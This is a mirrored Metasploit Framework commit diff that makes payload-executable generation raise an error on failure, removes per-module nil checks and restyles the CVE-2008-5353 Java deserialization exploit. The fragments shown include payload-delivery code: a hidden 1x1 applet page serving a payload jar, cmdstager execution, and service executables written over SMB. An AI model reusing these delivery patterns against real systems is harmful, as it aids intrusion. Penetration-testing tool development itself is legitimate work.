mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-29 18:07:27 +01:00
Land #6331, ensure generic payloads raise correct exceptions on failure
This commit is contained in:
commit
e4f9594646
@ -47,6 +47,15 @@ module Exploit::EXE
|
||||
exe
|
||||
end
|
||||
|
||||
|
||||
# Returns an executable.
|
||||
#
|
||||
# @param opts [Hash]
|
||||
# @option opts [String] :code Payload
|
||||
# @option opts [Array] :arch Architecture
|
||||
# @option opts [Msf::Module::PlatformList] :platform
|
||||
# @raise [Msf::NoCompatiblePayloadError] When #genereate_payload_exe fails to generate a payload.
|
||||
# @return [String]
|
||||
def generate_payload_exe(opts = {})
|
||||
return get_custom_exe unless datastore['EXE::Custom'].to_s.strip.empty?
|
||||
return get_eicar_exe if datastore['EXE::EICAR']
|
||||
@ -68,6 +77,11 @@ module Exploit::EXE
|
||||
end
|
||||
|
||||
exe = Msf::Util::EXE.to_executable(framework, opts[:arch], opts[:platform], pl, opts)
|
||||
|
||||
unless exe
|
||||
raise Msf::NoCompatiblePayloadError, "Failed to generate an executable payload due to an invalid platform or arch."
|
||||
end
|
||||
|
||||
exe_post_generation(opts)
|
||||
exe
|
||||
end
|
||||
@ -150,14 +164,42 @@ protected
|
||||
:sub_method => datastore['EXE::OldMethod']
|
||||
})
|
||||
|
||||
# Prefer the target's platform/architecture information, but use
|
||||
# the module's if no target specific information exists
|
||||
opts[:platform] ||= payload_instance.platform if self.respond_to? :payload_instance
|
||||
opts[:platform] ||= target_platform if self.respond_to? :target_platform
|
||||
opts[:platform] ||= platform if self.respond_to? :platform
|
||||
opts[:arch] ||= payload_instance.arch if self.respond_to? :payload_instance
|
||||
opts[:arch] ||= target_arch if self.respond_to? :target_arch
|
||||
opts[:arch] ||= arch if self.respond_to? :arch
|
||||
# This part is kind of tricky so we need to explain the logic behind the following load order.
|
||||
# First off, platform can be seen from different sources:
|
||||
#
|
||||
# 1. From the opts argument. For example: When you are using generate_payload_exe, and you want
|
||||
# to set a specific platform. This is the most explicit. So we check first.
|
||||
#
|
||||
# 2. From the metadata of a payload module. Normally, a payload module should include the platform
|
||||
# information, with the exception of some generic payloads. For example: generic/shell_reverse_tcp.
|
||||
# This is the most trusted source.
|
||||
#
|
||||
# 3. From the exploit module's target.
|
||||
#
|
||||
# 4. From the exploit module's metadata.
|
||||
#
|
||||
# Architecture shares the same load order.
|
||||
|
||||
unless opts[:platform]
|
||||
if self.respond_to?(:payload_instance) && payload_instance.platform.platforms != [Msf::Module::Platform]
|
||||
opts[:platform] = payload_instance.platform
|
||||
elsif self.respond_to? :target_platform
|
||||
opts[:platform] = target_platform
|
||||
elsif self.respond_to? :platform
|
||||
opts[:platform] = platform
|
||||
end
|
||||
end
|
||||
|
||||
unless opts[:arch]
|
||||
if self.respond_to? :payload_instance
|
||||
opts[:arch] = payload_instance.arch
|
||||
elsif self.respond_to? :target_arch
|
||||
$stderr.puts "target specific arch"
|
||||
opts[:arch] = target_arch
|
||||
elsif self.respond_to? :arch
|
||||
opts[:arch] = arch
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def exe_post_generation(opts)
|
||||
|
@ -95,10 +95,6 @@ class Metasploit4 < Msf::Exploit::Remote
|
||||
# Generate payload
|
||||
@pl = generate_payload_exe
|
||||
|
||||
if @pl.nil?
|
||||
fail_with(Failure::BadConfig, 'Please select a native bsd payload')
|
||||
end
|
||||
|
||||
# Start the server and use primer to trigger fetching and running of the payload
|
||||
begin
|
||||
Timeout.timeout(datastore['HTTPDELAY']) { super }
|
||||
|
@ -48,9 +48,6 @@ class Metasploit4 < Msf::Exploit::Local
|
||||
|
||||
def setup
|
||||
@pl = generate_payload_exe
|
||||
if @pl.nil?
|
||||
fail_with(Failure::BadConfig, 'Please select a native bsd payload')
|
||||
end
|
||||
|
||||
super
|
||||
end
|
||||
|
@ -113,9 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
def exploit
|
||||
@pl = generate_payload_exe
|
||||
if @pl.blank?
|
||||
fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF, select a native payload")
|
||||
end
|
||||
|
||||
@payload_url = ""
|
||||
|
||||
if datastore['EXTURL'].blank?
|
||||
|
@ -111,14 +111,6 @@ class Metasploit4 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def exploit
|
||||
# Cannot use generic/shell_reverse_tcp inside an elf
|
||||
# Checking before proceeds
|
||||
if generate_payload_exe.blank?
|
||||
fail_with(Failure::BadConfig,
|
||||
"#{peer} - Failed to store payload inside executable, " +
|
||||
"please select a native payload")
|
||||
end
|
||||
|
||||
execute_cmdstager(:linemax => 200, :nodelete => true)
|
||||
end
|
||||
|
||||
|
@ -123,10 +123,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
@payload_url = ''
|
||||
@dropped_elf = rand_text_alpha(rand(5) + 3)
|
||||
|
||||
if @pl.blank?
|
||||
fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF, select a native payload")
|
||||
end
|
||||
|
||||
if datastore['EXTURL'].blank?
|
||||
begin
|
||||
Timeout.timeout(datastore['HTTPDELAY']) { super }
|
||||
|
@ -83,9 +83,6 @@ class Metasploit4 < Msf::Exploit::Local
|
||||
# Cannot use generic/shell_reverse_tcp inside an elf
|
||||
# Checking before proceeds
|
||||
pl = generate_payload_exe
|
||||
if pl.blank?
|
||||
fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Failed to store payload inside executable, please select a native payload")
|
||||
end
|
||||
|
||||
exe_file = "#{datastore['WritableDir']}/#{rand_text_alpha(3 + rand(5))}.elf"
|
||||
|
||||
|
@ -138,13 +138,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
# NOTE: The EXE mixin automagically handles detection of arch/platform
|
||||
data = generate_payload_exe
|
||||
|
||||
if data
|
||||
print_status("Generated executable to drop (#{data.length} bytes)." )
|
||||
data = Rex::Text.to_hex( data, prefix="" )
|
||||
else
|
||||
print_error("Failed to generate the executable." )
|
||||
return
|
||||
end
|
||||
print_status("Generated executable to drop (#{data.length} bytes)." )
|
||||
data = Rex::Text.to_hex( data, prefix="" )
|
||||
|
||||
end
|
||||
|
||||
|
@ -13,12 +13,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
# Superceded by java_atomicreferencearray
|
||||
#include Msf::Exploit::Remote::BrowserAutopwn
|
||||
#autopwn_info({ :javascript => false })
|
||||
# include Msf::Exploit::Remote::BrowserAutopwn
|
||||
# autopwn_info({ :javascript => false })
|
||||
|
||||
def initialize( info = {} )
|
||||
|
||||
super( update_info( info,
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(info,
|
||||
'Name' => 'Sun Java Calendar Deserialization Privilege Escalation',
|
||||
'Description' => %q{
|
||||
This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM.
|
||||
@ -39,74 +39,73 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
[ 'URL', 'http://landonf.bikemonkey.org/code/macosx/CVE-2008-5353.20090519.html' ],
|
||||
[ 'URL', 'http://blog.cr0.org/2009/05/write-once-own-everyone.html' ]
|
||||
],
|
||||
'Platform' => %w{ linux osx solaris win },
|
||||
'Platform' => %w(linux osx solaris win),
|
||||
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Generic (Java Payload)',
|
||||
{
|
||||
'Platform' => ['java'],
|
||||
'Arch' => ARCH_JAVA,
|
||||
'Arch' => ARCH_JAVA
|
||||
}
|
||||
],
|
||||
[ 'Windows x86 (Native Payload)',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
'Arch' => ARCH_X86
|
||||
}
|
||||
],
|
||||
[ 'Mac OS X PPC (Native Payload)',
|
||||
{
|
||||
'Platform' => 'osx',
|
||||
'Arch' => ARCH_PPC,
|
||||
'Arch' => ARCH_PPC
|
||||
}
|
||||
],
|
||||
[ 'Mac OS X x86 (Native Payload)',
|
||||
{
|
||||
'Platform' => 'osx',
|
||||
'Arch' => ARCH_X86,
|
||||
'Arch' => ARCH_X86
|
||||
}
|
||||
],
|
||||
[ 'Linux x86 (Native Payload)',
|
||||
{
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86,
|
||||
'Arch' => ARCH_X86
|
||||
}
|
||||
],
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Dec 03 2008'
|
||||
))
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
# load the static jar file
|
||||
path = File.join( Msf::Config.data_directory, "exploits", "CVE-2008-5353.jar" )
|
||||
fd = File.open( path, "rb" )
|
||||
path = File.join(Msf::Config.data_directory, "exploits", "CVE-2008-5353.jar")
|
||||
fd = File.open(path, "rb")
|
||||
@jar_data = fd.read(fd.stat.size)
|
||||
fd.close
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
|
||||
def on_request_uri( cli, request )
|
||||
def on_request_uri(cli, request)
|
||||
data = nil
|
||||
host = nil
|
||||
port = nil
|
||||
|
||||
if not request.uri.match(/\.jar$/i)
|
||||
if not request.uri.match(/\/$/)
|
||||
send_redirect( cli, get_resource() + '/', '')
|
||||
if !request.uri.match(/\.jar$/i)
|
||||
if !request.uri.match(/\/$/)
|
||||
send_redirect(cli, get_resource + '/', '')
|
||||
return
|
||||
end
|
||||
|
||||
print_status("#{self.name} handling request")
|
||||
print_status("#{name} handling request")
|
||||
|
||||
payload = regenerate_payload( cli )
|
||||
if not payload
|
||||
print_error( "Failed to generate the payload." )
|
||||
payload = regenerate_payload(cli)
|
||||
if !payload
|
||||
print_error("Failed to generate the payload.")
|
||||
return
|
||||
end
|
||||
|
||||
@ -122,10 +121,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
print_status("Payload will be a Java bind shell")
|
||||
end
|
||||
if jar
|
||||
print_status( "Generated jar to drop (#{jar.length} bytes)." )
|
||||
jar = Rex::Text.to_hex( jar, prefix="" )
|
||||
print_status("Generated jar to drop (#{jar.length} bytes).")
|
||||
jar = Rex::Text.to_hex(jar, prefix = "")
|
||||
else
|
||||
print_error( "Failed to generate the executable." )
|
||||
print_error("Failed to generate the executable.")
|
||||
return
|
||||
end
|
||||
else
|
||||
@ -133,27 +132,22 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
# NOTE: The EXE mixin automagically handles detection of arch/platform
|
||||
data = generate_payload_exe
|
||||
|
||||
if data
|
||||
print_status( "Generated executable to drop (#{data.length} bytes)." )
|
||||
data = Rex::Text.to_hex( data, prefix="" )
|
||||
else
|
||||
print_error( "Failed to generate the executable." )
|
||||
return
|
||||
end
|
||||
print_status("Generated executable to drop (#{data.length} bytes).")
|
||||
data = Rex::Text.to_hex(data, prefix = "")
|
||||
|
||||
end
|
||||
|
||||
send_response_html( cli, generate_html( data, jar, host, port ), { 'Content-Type' => 'text/html' } )
|
||||
send_response_html(cli, generate_html(data, jar, host, port), 'Content-Type' => 'text/html')
|
||||
return
|
||||
end
|
||||
|
||||
print_status( "Sending Applet.jar" )
|
||||
send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } )
|
||||
print_status("Sending Applet.jar")
|
||||
send_response(cli, generate_jar, 'Content-Type' => "application/octet-stream")
|
||||
|
||||
handler( cli )
|
||||
handler(cli)
|
||||
end
|
||||
|
||||
def generate_html( data, jar, host, port )
|
||||
def generate_html(data, jar, host, port)
|
||||
html = "<html><head><title>Loading, Please Wait...</title></head>"
|
||||
html += "<body><center><p>Loading, Please Wait...</p></center>"
|
||||
html += "<applet archive=\"Applet.jar\" code=\"msf.x.AppletX.class\" width=\"1\" height=\"1\">"
|
||||
@ -162,11 +156,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
html += "<param name=\"lhost\" value=\"#{host}\"/>" if host
|
||||
html += "<param name=\"lport\" value=\"#{port}\"/>" if port
|
||||
html += "</applet></body></html>"
|
||||
return html
|
||||
html
|
||||
end
|
||||
|
||||
def generate_jar()
|
||||
return @jar_data
|
||||
def generate_jar
|
||||
@jar_data
|
||||
end
|
||||
|
||||
end
|
||||
|
@ -137,13 +137,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
# NOTE: The EXE mixin automagically handles detection of arch/platform
|
||||
data = generate_payload_exe
|
||||
|
||||
if data
|
||||
print_status("Generated executable to drop (#{data.length} bytes)." )
|
||||
data = Rex::Text.to_hex( data, prefix="" )
|
||||
else
|
||||
print_error("Failed to generate the executable." )
|
||||
return
|
||||
end
|
||||
print_status("Generated executable to drop (#{data.length} bytes)." )
|
||||
data = Rex::Text.to_hex( data, prefix="" )
|
||||
|
||||
end
|
||||
|
||||
|
@ -99,12 +99,6 @@ class Metasploit4 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def exploit
|
||||
# Cannot use generic/shell_reverse_tcp inside an elf
|
||||
# Checking before proceeds
|
||||
if generate_payload_exe.blank?
|
||||
fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Failed to store payload inside executable, please select a native payload")
|
||||
end
|
||||
|
||||
execute_cmdstager(linemax: 500)
|
||||
handler
|
||||
end
|
||||
|
@ -99,12 +99,6 @@ class Metasploit4 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def exploit
|
||||
# Cannot use generic/shell_reverse_tcp inside an elf
|
||||
# Checking before proceeds
|
||||
if generate_payload_exe.blank?
|
||||
fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload")
|
||||
end
|
||||
|
||||
execute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'], :nodelete => true)
|
||||
|
||||
# A last chance after the cmdstager
|
||||
|
@ -120,9 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
#Set up generic values.
|
||||
payload_exe = rand_text_alphanumeric(4 + rand(4))
|
||||
pl_exe = generate_payload_exe
|
||||
if pl_exe.nil?
|
||||
fail_with(Failure::BadConfig, "#{peer} - Failed to generate an EXE payload, please select a correct payload")
|
||||
end
|
||||
|
||||
append = false
|
||||
#Now arch specific...
|
||||
case target['Platform']
|
||||
|
@ -129,16 +129,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
vprint_status("Sent command #{cmd}")
|
||||
end
|
||||
|
||||
#
|
||||
# generate_payload_exe doesn't respect module's platform unless it's Windows, or the user
|
||||
# manually sets one. This method is a temp work-around.
|
||||
#
|
||||
def check_generate_payload_exe
|
||||
if generate_payload_exe.nil?
|
||||
fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF. Please manually set a payload.")
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
# Handle single command shot
|
||||
@ -154,8 +144,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
return
|
||||
end
|
||||
|
||||
check_generate_payload_exe
|
||||
|
||||
# Handle payload upload using CmdStager mixin
|
||||
execute_cmdstager({:flavor => :printf})
|
||||
end
|
||||
|
@ -204,10 +204,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
exe = ''
|
||||
opts = { :servicename => servicename }
|
||||
exe = generate_payload_exe_service(opts)
|
||||
begin
|
||||
exe = generate_payload_exe_service(opts)
|
||||
|
||||
fd << exe
|
||||
fd.close
|
||||
fd << exe
|
||||
ensure
|
||||
fd.close
|
||||
end
|
||||
|
||||
if subfolder
|
||||
print_status("Created \\#{fileprefix}\\#{filename}...")
|
||||
|
@ -140,18 +140,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
fd = rclient.open("\\#{filename}", 'rwct')
|
||||
|
||||
exe = ''
|
||||
opts = {
|
||||
:servicename => servicename,
|
||||
:code => code.encoded
|
||||
}
|
||||
if (datastore['PAYLOAD'].include? 'x64')
|
||||
opts.merge!({ :arch => ARCH_X64 })
|
||||
end
|
||||
exe = generate_payload_exe_service(opts)
|
||||
begin
|
||||
exe = ''
|
||||
opts = {
|
||||
:servicename => servicename,
|
||||
:code => code.encoded
|
||||
}
|
||||
if (datastore['PAYLOAD'].include? 'x64')
|
||||
opts.merge!({ :arch => ARCH_X64 })
|
||||
end
|
||||
exe = generate_payload_exe_service(opts)
|
||||
|
||||
fd << exe
|
||||
fd.close
|
||||
fd << exe
|
||||
ensure
|
||||
fd.close if fd
|
||||
end
|
||||
|
||||
print_status("Created \\#{filename}...")
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user